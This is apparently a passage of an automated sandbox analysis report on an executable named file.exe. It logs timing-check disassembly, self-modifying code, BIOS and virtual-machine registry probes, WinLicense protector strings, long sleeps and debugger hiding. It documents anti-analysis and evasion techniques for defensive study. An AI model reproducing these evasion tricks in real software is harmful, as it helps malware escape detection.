00007F6C54B5854Dh 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1037F second address: 4A10394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10394 second address: 4A103A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B5854Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103A4 second address: 4A103CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F6C544CAC31h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103CD second address: 4A103D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103D3 second address: 4A103D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103D7 second address: 4A10484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [eax] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6C54B58555h 0x00000011 sbb ah, 00000056h 0x00000014 jmp 00007F6C54B58551h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F6C54B58550h 0x00000020 sub cx, 6178h 0x00000025 jmp 00007F6C54B5854Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr fs:[00000030h] 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F6C54B58554h 0x00000039 sbb si, FBD8h 0x0000003e jmp 00007F6C54B5854Bh 0x00000043 popfd 0x00000044 pushad 0x00000045 jmp 00007F6C54B58556h 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d popad 0x0000004e push dword ptr [eax+18h] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 movsx edi, si 0x00000057 mov dh, ch 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104CA second address: 4A1052D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6C544CAC2Eh 0x00000008 and ch, 00000058h 0x0000000b jmp 00007F6C544CAC2Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 je 00007F6CC5039DE1h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F6C544CAC34h 0x00000021 sub eax, 34D54FB8h 0x00000027 jmp 00007F6C544CAC2Bh 0x0000002c popfd 0x0000002d movzx ecx, dx 0x00000030 popad 0x00000031 mov eax, 00000000h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 movsx edi, si 0x0000003c push esi 0x0000003d pop edx 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1052D second address: 4A1057B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c mov ebx, eax 0x0000000e pushfd 0x0000000f jmp 00007F6C54B58550h 0x00000014 sbb cx, 7478h 0x00000019 jmp 00007F6C54B5854Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esi+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F6C54B58550h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1057B second address: 4A10581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10581 second address: 4A10587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10587 second address: 4A10611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c call 00007F6C544CAC32h 0x00000011 call 00007F6C544CAC32h 0x00000016 pop eax 0x00000017 pop edi 0x00000018 pushfd 0x00000019 jmp 00007F6C544CAC30h 0x0000001e sub cx, D398h 0x00000023 jmp 00007F6C544CAC2Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr [esi+0Ch], eax 0x0000002d jmp 00007F6C544CAC36h 0x00000032 mov eax, dword ptr [ebx+4Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F6C544CAC37h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10611 second address: 4A10684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c pushad 0x0000000d call 00007F6C54B5854Ch 0x00000012 mov dx, si 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F6C54B58557h 0x0000001c sub ecx, 16C5D47Eh 0x00000022 jmp 00007F6C54B58559h 0x00000027 popfd 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+50h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10684 second address: 4A10688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10688 second address: 4A1069B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1069B second address: 4A1070B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c jmp 00007F6C544CAC2Eh 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 jmp 00007F6C544CAC30h 0x00000019 mov dword ptr [esi+18h], eax 0x0000001c jmp 00007F6C544CAC30h 0x00000021 mov eax, dword ptr [ebx+58h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6C544CAC37h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1070B second address: 4A10731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10731 second address: 4A10735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10735 second address: 4A1073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1073B second address: 4A10741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10741 second address: 4A10745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10745 second address: 4A10749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10749 second address: 4A1075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b pushad 0x0000000c mov bx, ax 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ax, AD17h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1075E second address: 4A10798 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6C544CAC2Ch 0x00000008 jmp 00007F6C544CAC35h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov dword ptr [esi+20h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6C544CAC2Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10798 second address: 4A1079D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1079D second address: 4A107C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F6C544CAC2Dh 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+60h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6C544CAC2Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A107C1 second address: 4A107C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A107C7 second address: 4A107CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A107CB second address: 4A10876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+24h], eax 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f pushad 0x00000010 movsx edi, ax 0x00000013 mov edi, eax 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [ebx+64h] 0x0000001a jmp 00007F6C54B58554h 0x0000001f mov dword ptr [esi+28h], eax 0x00000022 pushad 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F6C54B5854Ch 0x0000002a sbb cx, 0408h 0x0000002f jmp 00007F6C54B5854Bh 0x00000034 popfd 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 jmp 00007F6C54B58556h 0x0000003d popad 0x0000003e mov eax, dword ptr [ebx+68h] 0x00000041 jmp 00007F6C54B58550h 0x00000046 mov dword ptr [esi+2Ch], eax 0x00000049 jmp 00007F6C54B58550h 0x0000004e mov ax, word ptr [ebx+6Ch] 0x00000052 pushad 0x00000053 mov eax, 51BC1E9Dh 0x00000058 mov eax, 44C10799h 0x0000005d popad 0x0000005e mov word ptr [esi+30h], ax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10876 second address: 4A1087A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1087A second address: 4A1088B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1088B second address: 4A108C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx ebx, cx 0x00000016 call 00007F6C544CAC34h 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A108C3 second address: 4A108DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B58557h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A108DE second address: 4A1090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, ax 0x00000015 mov ecx, 7EBA3EDBh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A1090D second address: 4A109C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 37089E42h 0x00000008 pushfd 0x00000009 jmp 00007F6C54B58553h 0x0000000e or si, 053Eh 0x00000013 jmp 00007F6C54B58559h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [ebx+0000008Ch] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F6C54B58553h 0x00000029 jmp 00007F6C54B58553h 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [esi+34h], eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F6C54B58554h 0x0000003a and esi, 3A9E4BC8h 0x00000040 jmp 00007F6C54B5854Bh 0x00000045 popfd 0x00000046 mov bl, ah 0x00000048 popad 0x00000049 mov eax, dword ptr [ebx+18h] 0x0000004c pushad 0x0000004d jmp 00007F6C54B58551h 0x00000052 push eax 0x00000053 push edx 0x00000054 mov cx, 767Dh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A109C4 second address: 4A109C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A109C8 second address: 4A109D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+38h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A109D7 second address: 4A109DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A109DD second address: 4A109E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A109E2 second address: 4A10A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6C544CAC2Ah 0x00000009 and ecx, 70E90088h 0x0000000f jmp 00007F6C544CAC2Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F6C544CAC38h 0x0000001b xor cx, 62E8h 0x00000020 jmp 00007F6C544CAC2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov eax, dword ptr [ebx+1Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10A38 second address: 4A10A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10A3C second address: 4A10A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10A42 second address: 4A10A72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c jmp 00007F6C54B58550h 0x00000011 mov eax, dword ptr [ebx+20h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bx, 2690h 0x0000001b mov dx, 1BBCh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10A72 second address: 4A10AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6C544CAC2Eh 0x00000013 and al, 00000008h 0x00000016 jmp 00007F6C544CAC2Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F6C544CAC38h 0x00000022 sub si, CC68h 0x00000027 jmp 00007F6C544CAC2Bh 0x0000002c popfd 0x0000002d popad 0x0000002e lea eax, dword ptr [ebx+00000080h] 0x00000034 pushad 0x00000035 mov edx, eax 0x00000037 mov esi, 12B51E57h 0x0000003c popad 0x0000003d push 00000001h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F6C544CAC34h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10AFE second address: 4A10B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10B0D second address: 4A10B48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F6C544CAC2Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov si, di 0x00000014 mov dl, 0Bh 0x00000016 popad 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10B48 second address: 4A10B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10B4C second address: 4A10B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10B52 second address: 4A10B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B5854Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10B65 second address: 4A10B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e jmp 00007F6C544CAC2Eh 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10B9C second address: 4A10BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10BA0 second address: 4A10BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10BA6 second address: 4A10BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10BAC second address: 4A10BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10BB0 second address: 4A10BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C0D second address: 4A10C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F6CC50396C7h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6C544CAC2Ch 0x00000016 sbb ax, 5CF8h 0x0000001b jmp 00007F6C544CAC2Bh 0x00000020 popfd 0x00000021 mov si, 222Fh 0x00000025 popad 0x00000026 mov eax, dword ptr [ebp-0Ch] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F6C544CAC31h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C62 second address: 4A10C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C68 second address: 4A10C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C6C second address: 4A10C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C70 second address: 4A10CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b jmp 00007F6C544CAC2Fh 0x00000010 lea eax, dword ptr [ebx+78h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push ebx 0x00000016 pop eax 0x00000017 pop ebx 0x00000018 pushad 0x00000019 call 00007F6C544CAC2Ah 0x0000001e pop ecx 0x0000001f mov ebx, 2F564DA6h 0x00000024 popad 0x00000025 popad 0x00000026 push 00000001h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6C544CAC36h 0x00000031 sub ax, 1B48h 0x00000036 jmp 00007F6C544CAC2Bh 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10CD3 second address: 4A10D20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F6C54B5854Dh 0x00000011 pop esi 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F6C54B58558h 0x0000001d nop 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 473D32 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 4711F6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 647A7E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 473C64 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6AD707 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00704171 rdtsc | 0_2_00704171
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070920C sldt word ptr [eax] | 0_2_0070920C
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 1010
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 813
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.4 %
Source: C:\Users\user\Desktop\file.exe TID: 7872 | Thread sleep count: 65 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7872 | Thread sleep time: -130065s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7792 | Thread sleep count: 64 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7792 | Thread sleep count: 91 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7844 | Thread sleep count: 1010 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7844 | Thread sleep time: -2021010s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7792 | Thread sleep count: 92 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7792 | Thread sleep count: 93 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7792 | Thread sleep count: 100 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7792 | Thread sleep count: 89 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7792 | Thread sleep count: 114 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7792 | Thread sleep count: 93 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7792 | Thread sleep count: 48 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7944 | Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7864 | Thread sleep count: 813 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7864 | Thread sleep time: -1626813s >= -30000s
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00417727 FindFirstFileExW, | 0_2_00417727
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0496798E FindFirstFileExW, | 0_2_0496798E
Source: file.exe, file.exe, 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.3843100484.0000000005270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3841763949.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 42% for more than 60s
Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
